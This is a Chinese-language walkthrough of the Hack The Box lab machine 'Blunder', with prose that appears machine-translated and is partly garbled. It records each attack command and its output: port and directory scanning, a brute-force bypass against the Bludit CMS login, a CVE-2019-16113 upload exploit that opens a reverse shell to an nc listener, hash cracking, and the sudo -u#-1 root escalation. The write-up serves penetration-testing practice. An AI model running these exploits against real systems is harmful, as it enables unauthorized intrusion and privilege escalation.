共计 9580 个字符,预计需要花费 24 分钟才能阅读完成。
免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务发现
┌──(root💀kali)-[~/htb/Blunder]
└─# nmap -sV -Pn 10.10.10.191 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-12-21 01:34 EST
Nmap scan report for 10.10.10.191
Host is up (0.30s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.09 seconds
21 端口曾经被敞开了,只有 80 端口一个方向,先爆破看看。
爆破目录
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.191
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.10.191/_21-12-21_01-37-07.txt
Error Log: /root/dirsearch/logs/errors-21-12-21_01-37-07.log
Target: http://10.10.10.191/
[01:37:09] Starting:
[01:37:21] 200 - 7KB - /%3f/
[01:37:25] 400 - 304B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[01:37:45] 200 - 955B - /.github/
[01:37:46] 200 - 563B - /.gitignore
[01:38:28] 200 - 7KB - /0
[01:38:55] 200 - 1KB - /LICENSE
[01:39:00] 200 - 3KB - /README.md
[01:39:59] 200 - 3KB - /about
[01:40:23] 301 - 0B - /admin -> http://10.10.10.191/admin/
[01:40:32] 200 - 2KB - /admin/
[01:43:38] 400 - 304B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[01:45:44] 200 - 30B - /install.php
[01:48:07] 200 - 22B - /robots.txt
[01:48:16] 403 - 277B - /server-status/
[01:48:16] 403 - 277B - /server-status
[01:49:19] 200 - 118B - /todo.txt 通常我会再用 gobuster 再爆破一次
└─# gobuster dir -w /usr/share/wordlists/Web-Content/common.txt -u http://10.10.10.191 -t 30 --no-error
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.191
[+] Method: GET
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/21 01:51:39 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 277]
/.git/logs/ (Status: 301) [Size: 0] [--> http://10.10.10.191/.git/logs]
/.htaccess (Status: 403) [Size: 277]
/.gitignore (Status: 200) [Size: 563]
/.hta (Status: 403) [Size: 277]
/0 (Status: 200) [Size: 7562]
/LICENSE (Status: 200) [Size: 1083]
/about (Status: 200) [Size: 3281]
/admin (Status: 301) [Size: 0] [--> http://10.10.10.191/admin/]
/cgi-bin/ (Status: 301) [Size: 0] [--> http://10.10.10.191/cgi-bin]
/robots.txt (Status: 200) [Size: 22]
/server-status (Status: 403) [Size: 277]
===============================================================
2021/12/21 01:53:33 Finished
===============================================================
联合两次爆破后果一一查看咱们感兴趣的文件和目录
README.md
ludit](https://www.bludit.com/)
================================
**Simple**, **Fast** and **Flexible** CMS.
Bludit is a web application to build your own **website** or **blog** in seconds, it's completely **free and open source**. Bludit uses files in JSON format to store the content, you don't need to install or configure a database. You only need a web server with PHP support.
Bludit is a **Flat-File** CMS.
Bludit supports **Markdown** and **HTML code** for the content.
- [Plugins](https://plugins.bludit.com)
- [Themes](https://themes.bludit.com)
- [Documentation](https://docs.bludit.com)
- Help and Support [Forum](https://forum.bludit.org) and [Chat](https://gitter.im/bludit/support)
失去 cms 名称:Bludit
todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDINGftp 确认是被作者敞开了。cms 降级没有实现,暗示有破绽,fergus可能是一个用户名。
搜寻这个 cms 的利用代码
┌──(root💀kali)-[~/htb/Blunder]
└─# searchsploit Bludit
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass | php/webapps/48746.rb
Bludit - Directory Traversal Image File Upload (Metasploit) | php/remote/47699.rb
Bludit 3.9.12 - Directory Traversal | php/webapps/48568.py
Bludit 3.9.2 - Auth Bruteforce Bypass | php/webapps/48942.py
Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit) | php/webapps/49037.rb
Bludit 3.9.2 - Directory Traversal | multiple/webapps/48701.txt
bludit Pages Editor 3.0.0 - Arbitrary File Upload | php/webapps/46060.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
存在一个暴力枚举破绽,把 48942.py 复制到本地,将 fergus 保留到 user.txt
┌──(root💀kali)-[~/htb/Blunder]
└─# python3 48942.py -l http://10.10.10.191/admin/login.php -u ./user.txt -p /usr/share/wordlists/SecLists/Passwords/2020-200_most_used_passwords.txt
[*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX
[◣] Brute Force: Testing -> fergus:123456
[┘] Brute Force: Testing -> fergus:123456789
[../.....] Brute Force: Testing -> fergus:picture1
[.] Brute Force: Testing -> fergus:password
[b] Brute Force: Testing -> fergus:12345678
[←] Brute Force: Testing -> fergus:111111
[┬] Brute Force: Testing -> fergus:123123
[▖] Brute Force: Testing -> fergus:12345
[◓] Brute Force: Testing -> fergus:1234567890
[↙] Brute Force: Testing -> fergus:senha
[o] Brute Force: Testing -> fergus:1234567
[└] Brute Force: Testing -> fergus:qwerty
[o] Brute Force: Testing -> fergus:abc123
[┬] Brute Force: Testing -> fergus:Million2
[├] Brute Force: Testing -> fergus:000000
[ ] Brute Force: Testing -> fergus:1234
[▁] Brute Force: Testing -> fergus:iloveyou
[◑] Brute Force: Testing -> fergus:aaron431
[\] Brute Force: Testing -> fergus:password1
[┘] Brute Force: Testing -> fergus:qqww1122
[↙] Brute Force: Testing -> fergus:123
[p] Brute Force: Testing -> fergus:omgpop
[◣] Brute Force: Testing -> fergus:123321
[..\.....] Brute Force: Testing -> fergus:654321
[-] Brute Force: Testing -> fergus:qwertyuiop
[▆] Brute Force: Testing -> fergus:qwer123456
[∧] Brute Force: Testing -> fergus:123456a
[o] Brute Force: Testing -> fergus:a123456
[◤] Brute Force: Testing -> fergus:666666
[◣] Brute Force: Testing -> fergus:asdfghjkl
[/] Brute Force: Testing -> fergus:ashley
[▗] Brute Force: Testing -> fergus:987654321
[▘] Brute Force: Testing -> fergus:RolandDeschain
[*] SUCCESS !!
[+] Use Credential -> fergus:RolandDeschain
拿到 cms 登录凭证:fergus:RolandDeschain
初始 shell
依据搜寻的破绽信息,这个 cms 还存在一个上传破绽,然而 kali 上的 payload 须要用到 msf,咱们并不想用这个工具
从 msf 里这个 exp 的版本号CVE-2019-16113, 在 github 上找到了这个 poc
依据 poc 的利用步骤,先把 RolandDeschain 保留在 pass 文件
开启一个监听
nc -lnvp 4242
执行 poc
┌──(root💀kali)-[~/htb/Blunder]
└─# python3 poc.py
_____ _ ______ _____ _____
| __ \ | | | ___ \/ __ \| ___|
| | \/ ___| |_ | |_/ /| / \/| |__
| | __ / _ \ __| | / | | | __|
| |_\ \ __/ |_ _| |\ \ | \__/\| |___
\____/\___|\__(_)_| \_| \____/\____/
This exploit combines CVE-2019-17240 & CVE-2019-16113 to gain remote shell on target.
Created by: kisho64 (@h_a_m_i__)
Enter target URL (i.e. https://target.com): http://10.10.10.191
[~] Enter listener's IP: 10.10.14.3
[~] Enter listener's port: 4242
[...] Checking if the target is live...
[+] The target is live! We are good to go...
[~] Should I bruteforce username? [Y/N]: N
[~] What username should I use? (leave this to use admin as username): fergus
[~] Enter the location for password list: /root/htb/Blunder/pass
[*] Tried: RolandDeschain
[+] Creds found: fergus:RolandDeschain
[...] Attempting to login now...
[+] Login succeed... We are good to go :)
[+] The payload mYTcGvAwRD.php has been uploaded...
[+] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/mYTcGvAwRD.php
[+] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/mYTcGvAwRD.php
拿到初始 shell
┌──(root💀kali)-[~/htb/Blunder]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.191] 46044
bash: cannot set terminal process group (1279): Inappropriate ioctl for device
bash: no job control in this shell
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$
提权到 hugo
user.txt 在 hugo 用户下,咱们没有权限查看
在文件 /var/www/bludit-3.10.0a/bl-content/databases/users.php 找到 hugo 的 md5 明码:faca404fd5c0a31cf1897b823c695c85cffeb98d
www-data@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$ cat /var/www/bludit-3.10.0a/bl-content/databases/users.php
<r/www/bludit-3.10.0a/bl-content/databases/users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "","role":"User","password":"faca404fd5c0a31cf1897b823c695c85cffeb98d","email":"",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "","tokenAuth":"b380cb62057e9da47afce66b4615107d","tokenAuthTTL":"2009-03-15 14:00","twitter":"",
"facebook": "","instagram":"",
"codepen": "","linkedin":"",
"github": "","gitlab":""}
}
这里解进去当前是:Password120
提权到 hugo 的账号:
www-data@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$ su hugo
su hugo
Password: Password120
id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
whoami
hugo提权
查看 hugo 特权信息
hugo@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$ sudo -l
sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
能够间接提权到 root
hugo@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$ sudo -u#-1 /bin/bash
<2/bl-kernel/admin/controllers$ sudo -u#-1 /bin/bash
root@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers# id
id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers# whoami
whoami
root
正文完
